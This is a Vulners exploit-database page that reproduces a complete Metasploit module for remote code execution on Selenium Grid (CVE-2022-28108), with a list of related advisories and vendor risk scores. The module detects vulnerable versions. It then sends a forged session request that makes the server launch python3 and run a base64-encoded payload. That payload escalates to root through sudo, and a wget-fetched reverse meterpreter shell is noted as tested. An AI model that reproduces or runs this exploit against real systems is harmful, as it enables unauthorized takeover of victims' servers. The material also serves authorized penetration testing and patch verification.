Vulners
Lucene search
Selenium Chrome Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Selenium Firefox Remote Code Execution Exploit | 8 Jan 202500:00 | – | zdt |
 | CVE-2022-28108 | 19 Apr 202203:15 | – | attackerkb |
 | Exploit for Cross-Site Request Forgery (CSRF) in Selenium Selenium_Grid | 9 Jan 202522:28 | – | githubexploit |
 | CVE-2022-28108 vulnerabilities | 10 Apr 202602:13 | – | cgr |
 | CVE-2022-28108 | 19 Apr 202207:23 | – | circl |
 | Selenium Server 跨站请求伪造漏洞 | 19 Apr 202200:00 | – | cnnvd |
 | Selenium Server Cross-Site Request Forgery Vulnerability | 21 Apr 202200:00 | – | cnvd |
 | Selenium Grid Cross-Site Request Forgery (CVE-2022-28108) | 7 Jun 202200:00 | – | checkpoint_advisories |
 | CVE-2022-28108 | 19 Apr 202202:55 | – | cve |
 | CVE-2022-28108 | 19 Apr 202202:55 | – | cvelist |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Selenium chrome RCE',
'Description' => %q{
Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
},
'Author' => [
'randomstuff (Gabriel Corona)', # Exploit development
'Wiz Research', # Vulnerability research
'Takahiro Yokoyama' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2022-28108'],
['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
],
'Payload' => {},
'Platform' => %w[linux],
'Targets' => [
[
'Linux Command', {
'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
'DefaultOptions' => {
# tested cmd/linux/http/x64/meterpreter_reverse_tcp
'FETCH_COMMAND' => 'WGET'
}
}
],
],
'DefaultOptions' => {
'FETCH_DELETE' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2022-04-18',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(4444),
]
)
end
def check
# Request for Selenium Grid version 4
v4res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'status')
})
return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v4res && v4res.get_json_document &&
v4res.get_json_document.include?('value') &&
v4res.get_json_document['value'].include?('message') &&
v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
# Request for Selenium Grid version 3
v3res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200
js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
begin
json_data = JSON.parse(json_str)
rescue JSON::ParserError
return Exploit::CheckCode::Unknown('Unable to determine the version.')
end
return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version']
# Extract the version
version = Rex::Version.new(json_data['version'])
if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
end
CheckCode::Appears("Version #{version} detected, which is vulnerable.")
end
def exploit
b64encoded_payload = Rex::Text.encode_base64(
"if sudo -n true 2>/dev/null; then\n"\
" echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
"else\n"\
" #{payload.encoded}\n"\
"fi\n"
)
# Create the request body as a Ruby hash and then convert it to JSON
body = {
'capabilities' => {
'alwaysMatch' => {
'browserName' => 'chrome',
'goog:chromeOptions' => {
'binary' => '/usr/bin/python3',
'args' => ["-cimport base64,os; bp=b'#{b64encoded_payload}'; os.system(base64.b64decode(bp).decode())"]
}
}
}
}.to_json
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
'headers' => { 'Content-Type' => 'text/plain' },
'data' => body
})
fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2025 00:00Current
9High risk
Vulners AI Score9
CVSS 29.3
CVSS 3.18.8
EPSS0.22369